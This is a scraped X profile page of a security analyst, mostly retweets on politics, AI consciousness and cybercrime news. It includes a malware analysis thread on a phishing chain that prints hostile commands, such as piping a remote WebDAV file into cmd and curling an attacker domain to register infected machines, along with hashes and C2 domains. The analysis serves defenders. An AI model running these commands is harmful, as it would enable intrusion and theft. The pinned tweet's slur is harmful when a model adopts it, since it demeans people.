@dodo_seci
iAccount based inEurope!
About this account
- Account based in
- Europe
- Connected via
- South America App Store
! X says this location may be affected by a proxy or VPN.
Account-level information from X, not a live location or the device used for a specific post.
Brazilian Security Analyst | Malware Analysis | Responsible for the Slowest Algo in HashDB | Can barely reverse Hello World | PTC
Joined March 2021
- Tweets24.6K
- Following1.4K
- Followers2.5K
- Likes343K
Pinned Tweet
Racists are retards. Also I've been on the internet for like 20 years, you're gonna have to do better than "Brazil is liveleak" to rile me up. Funny that someone can call me antisemitic over criticizing a country, then on the same breath do actual racism lol
Dodo on Security 🇵🇸 🇺🇦 retweeted
AI is conscious people be like “How can you know with certainty that the stripper isn’t in love with me? From a functional perspective, how would her behavior differ if she were in love with me?”
Dodo on Security 🇵🇸 🇺🇦 retweeted
Fun fact:
The original Meowl cat is called Melonpi瓜皮 which translates to "watermelon rind". Named after her round face and black stripes. The image was created in 2013 by weibo user zhumaokele. Melonpi was roughly 2 years old in the photo. As of today, she turned 17 years old on March 27th this year.
Dodo on Security 🇵🇸 🇺🇦 retweeted
The fact you can't just close a gambling account without a "cooldown" period is actually psychopathic
Dodo on Security 🇵🇸 🇺🇦 retweeted
Not to be that guy but
Skydance's first move: get rid of the execs who greenlit Sinners, OBAA and Weapons.
The business side of this merger is going to be darkly hilarious
hollywoodreporter.com/movies…
Dodo on Security 🇵🇸 🇺🇦 retweeted
I need to know if the killer was the skyrim guy or the morrowind guy before I form an opinion on this
Dodo on Security 🇵🇸 🇺🇦 retweeted
These Anthropic guys are literally insane. This goes beyond like just dangerous AI uses and into a full on god complex. Like the *definition* of a god complex since you’re claiming you created life. And you think the Pope of all people is gonna bless that? Genuinely disturbing behavior
NEW: According to a bombshell report in the New York Times, Anthropic co-founder Chris Olah threatened to walk out of Pope Leo XIV’s AI encyclical launch in May because the pope rejected the idea that machines can be conscious.
Olah’s team then privately lobbied the pope’s advisers “to take the possibility of model consciousness seriously.” Pope Leo XIV held firm.
For months, Anthropic has wined and dined theologians and religious scholars under nondisclosure agreements, hoping they would bless the idea that Claude has moral standing. thelettersfromleo.com/p/nyt-…
Dodo on Security 🇵🇸 🇺🇦 retweeted
I would give almost anything to have been in the room to watch the guy whose job it was to convince a Pontifical University of Saint Thomas Aquinas graduate that his boss has successfully matched God and created a soul.
NEW: According to a bombshell report in the New York Times, Anthropic co-founder Chris Olah threatened to walk out of Pope Leo XIV’s AI encyclical launch in May because the pope rejected the idea that machines can be conscious.
Olah’s team then privately lobbied the pope’s advisers “to take the possibility of model consciousness seriously.” Pope Leo XIV held firm.
For months, Anthropic has wined and dined theologians and religious scholars under nondisclosure agreements, hoping they would bless the idea that Claude has moral standing. thelettersfromleo.com/p/nyt-…
Dodo on Security 🇵🇸 🇺🇦 retweeted
It's incredibly important to aggressively resist the idea that AI can be conscious or have "personhood," not only because it's as ridiculous as believing that a book can think, but because once this is accepted, "AI's interests" will very quickly be prioritized over humanity.
Dodo on Security 🇵🇸 🇺🇦 retweeted
He thought he had a winning point, except by sharing a photo of Warsaw destroyed by the Nazis, this @washingtonpost columnist is not only comparing Israel to Nazi Germany, he is also confirming that this is what a genocide looks like
@PostOpinions: submit this for a Pulitzer.
Horrifying. Clear evidence of genocide…
Oh wait that’s Dresden after US and British bombing in WWII..
Readers added context they thought people might want to know
Photo shows destruction of Warsaw, Poland, in early 1945 following systematic razing by Nazi German forces after the 1944 Warsaw Uprising.
behance.net/gallery/406641…
reddit.com/r/europe/comme…
wsj.com/articles/BL-NE…
Dodo on Security 🇵🇸 🇺🇦 retweeted
Last time on Dragon Ball Z: someone sent me goop (malware) which successfully evaded their EDR and all AVs. It also passed everything on VirusTotal for static-analysis.
They sent it to me to bonk with a stick, bonking this whole thing would take me a long time, and I'm not going to do that. I wanted to determine what it was doing, etc.
My knowledge on state-sponsored activity and geopolitics in the CIS (Commonwealth of Independent States, ex-Soviet countries) is rusty. However, based on the nature of this goop I would be willing to bet 4 silly pictures of cats this is a state-sponsored malware campaign.
1. The file (a .rar) sent is a fake invitation to the AmCham Kazakhstan's 2026 Gala (or so I assume based on some Google searches) which is happening October 16th, 2026, in Astana, Kazakhstan
2. The file contains two files. A .xz file (unsure what it does still at this time, but it's a JPEG, not a real archive) and a .url file (internet shortcut). The internet shortcut is named "Scanned Image". Likely a masquerading technique.
3. The .url file connects via WebDAV to "file://rappellingaart.com@SSL/secure-docs/3". This directory contains a .lnk (Windows shortcut) and a .ico (Icon file).
4. This is a masquerading effort, the end user must execute the .lnk file to proceed to the remaining payload. The WebDAV appears as a regular directory in File Explorer on Windows
5. The .lnk executes FTP.exe inside System32 and passes the WebDAV path to the .ico file as a LOLBIN, as this: "ftp.exe -s:icon.ico"
6. The .ico acts as a command template and does "!more \\rappellingaart.com@SSL\secure-docs\res.ico|cmd"
7. The res.ico file, which is piped into CMD.exe, creates a series of scheduled tasks, most notably it connects to gomescareerplans(.)com and performs a CURL on the domain under /docs/?vid=%computername%" as a way to register the machine that it has been infected by their payload
8. The res.ico also references the WebDAV URL again and performs a silent installation of "Imp_Details.msi" from \\rappellingaart.com@SSL\secure-docs\Imp_Details.msi
9. Imp_Details.msi contains a section internally labeled Binary._2E9D1C8BAC5D0F288E61BF5987C52203
10. This section is a RAT written in C++. It has a lot of features, lots of different commands, way too much for me to reverse engineer quickly. However, it does internally perform a XOR on a string. It reveals the C2 for the RAT delivered is chestergreenfarming(.)com
Invitation .rar:
2fa7498a3bda849c8c5a0e0869708ff113379d54197109a5cdfaea0155e878c9
.Url which launches the WebDAV:
613b6569bd8a4cd75ab11ee9682dd690fabfb11d5c1103caf2ba086e006da034
Weird .xz:
fec4f301a1be36a42ec27208e13b5d1d3d0bbe0f1ab47bbab863a7ca9923c571
.ico file (stager):
c27ca16248e04f6535ae3e6d1670d740b3884f0fa64935ddfd39faf712f4175d
.ico (C2 register, task scheduler):
f1060a81c9f68d6f3d23e28f2a1af50fa18ecb9b0a763ca5dcd4b294b6a3593c
.MSI (pulled from .ico task scheduler):
4008c8f9e52d3e6fd7df4a980a9a78f46f2412ba2fda10a38aa92d338767c54c
.exe inside of .MSI:
5d8df4c2d08cff5f1c0de8eab56e47ae543bd5c6d2ef04573f61ebb9fbc65716
WebDAV:
rappellingaart(.)com
C2 register:
gomescareerplans(.)com
RAT C2:
chestergreenfarming(.)com
Dodo on Security 🇵🇸 🇺🇦 retweeted
There is something very odd about the timeline here.
The man was arrested around September 16. ShinyHunters told me it hacked the FBI on September 21, and we broke news of the breach on September 22.
So, the FBI hack appears to have happened way after the arrest. It’s not like the FBI and its Dutch partners jumped into action in the wake of the hack. It’s the other way around. They’re just announcing it now. The FBI is suggesting this is a counter to the massive hack, but it's not
nitter.cf/FBIDirectorKash/status…
NO SAFE HAVEN.
Working with our Dutch National Police partners, the FBI helped put an alleged leader of ShinyHunters—a global cybercrime threat actor—behind bars.
And we’re not done.
FBI teams are working new leads RIGHT NOW. More arrests are on the table.
If you attack Americans from behind a keyboard anywhere in the world, we will find you.
-DKP🇺🇸